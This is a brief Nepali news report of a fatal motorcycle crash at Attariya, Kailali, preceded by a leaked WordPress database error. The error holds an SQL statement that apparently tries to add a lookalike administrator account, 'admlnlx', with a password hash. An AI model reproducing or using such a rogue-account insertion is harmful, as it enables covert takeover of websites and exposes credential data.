WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bu8cmKikSIDHYXDv.LE8hiopXjcgzI/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 18:15:44', '', 'admlnlx', 'admlnlx')
कैलाली, पुस १० –
कैलालीको अत्तरियामा गएराति मोटरसाइकल दुर्घटना हुंदा एकजनाको ज्यान गएको छ ।
राति करिब १२ बजेको समयमा गोदावरी तर्फबाट तीव्र गतिमा आएको से।४प। ५४०९ नं को मोटरसाइकल अत्तरिया चौराहामा रहेको पार्कको रेलिङमा ठोक्किएपछि चालक कञ्चनपुर कृष्णनगरपालिका–२ बस्ने २२ वर्षीय सुरेश भट्टको मृत्यु भएको इलाका प्रहरी कार्यालय मालाखेतीले जनाएको छ ।
तीव्र गतिमा रहेको मोटरसाइकलको सन्तुलन गुमाउँदा दुर्घटना भएको हुन सक्ने प्रहरीले जनाएको छ । दुर्घटनामा गम्भीर घाइते भट्टको सेती अञ्चल अस्पतालमा मृत्यु भएको हो । – रासस